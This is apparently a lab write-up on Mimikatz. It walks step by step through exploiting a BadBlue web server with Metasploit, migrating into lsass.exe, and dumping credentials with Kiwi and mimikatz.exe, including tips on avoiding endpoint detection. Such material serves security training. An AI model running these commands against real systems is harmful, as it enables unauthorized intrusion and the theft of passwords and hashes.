Mimikatz

Mimikatz is a post-exploitation tool for Windows that extracts credentials from a compromised host: clear-text passwords and NTLM hashes that the Local Security Authority Subsystem Service (lsass.exe) keeps in memory for logged-on users, Kerberos tickets, and the NTLM hashes of local accounts stored in the SAM (Security Accounts Manager) registry hive. These are two different sources: the SAM hashes are read from the registry (decrypted with the boot key from the SYSTEM hive), while logon-session credentials come from lsass memory. Either the pre-compiled Mimikatz executable or Kiwi, the Meterpreter extension that packages the same Mimikatz functionality, can be used.

Note: Mimikatz requires elevated privileges. Reading lsass memory needs SeDebugPrivilege, which only administrators can enable (privilege::debug); reading the SAM and LSA secrets from the registry needs SYSTEM, obtained by running from a SYSTEM process or with token::elevate from an administrator context.

Demo Dumping

nmap -sV [TARGET IP]

msfconsole -q
search badblue
use exploit/windows/http/badblue_passthru
set RHOSTS [TARGET IP]
exploit

meterpreter> sysinfo
getuid
pgrep lsass
migrate 788
getuid

# Using Kiwi Module
load kiwi
?
creds_all
lsa_dump_sam
lsa_dump_secrets

# Using Mimikatz directly
cd C:\\
cd Temp
upload /usr/share/windows-resources/mimikatz/x64/mimikatz.exe
shell
.\mimikatz.exe
privilege::debug
lsadump::sam
lsadump::secrets
sekurlsa::logonpasswords

First, I ran a network scan with Nmap to detect the version of services running on the target system using nmap -sV [TARGET IP].

Then, I launched the Metasploit framework with msfconsole -q and searched for a module for the vulnerable BadBlue web server using search badblue. After finding the exploit, I selected it with use exploit/windows/http/badblue_passthru, pointed it at the target with set RHOSTS [TARGET IP], and launched it with exploit.

Once I had a Meterpreter session, I checked system information with sysinfo and the current user with getuid. I then looked up the process ID of lsass.exe with pgrep lsass and migrated the session into it with migrate 788 (use whatever PID pgrep returns; 788 was the value on this host). lsass.exe runs as SYSTEM, so after migration the session runs as SYSTEM as well, which the second getuid confirms. Migrating into a SYSTEM process only succeeds if the session already holds the rights to open it, so this step does not escalate from an unprivileged user. A caveat: lsass.exe is fragile, and if it crashes the host reboots, so migrating into another SYSTEM process is the safer choice when all that is needed is a SYSTEM context.

I then loaded the Kiwi extension in Meterpreter with load kiwi, ran creds_all to pull the credentials held in lsass memory for logged-on users (NTLM hashes and any clear-text passwords), lsa_dump_sam to dump the local account hashes from the SAM, and lsa_dump_secrets to dump LSA secrets such as service account passwords.

Lastly, I used Mimikatz directly. I uploaded mimikatz.exe to C:\Temp, dropped into a shell, and ran it. privilege::debug enables SeDebugPrivilege on the current token so that Mimikatz can open lsass.exe; it does not elevate by itself. lsadump::sam and lsadump::secrets read the SAM and SECURITY registry hives and need SYSTEM, which this shell has because it was spawned from a session migrated into lsass.exe (from a plain administrator shell, run token::elevate first). sekurlsa::logonpasswords then walks lsass memory and prints the NTLM hash, and any clear-text password, for each current logon session; clear-text passwords only appear where a provider such as WDigest still caches them, which current Windows versions disable by default. Writing mimikatz.exe to disk is the noisiest step of this demo, since the stock binary is detected by most endpoint protection, which is one reason to prefer the in-memory Kiwi route.
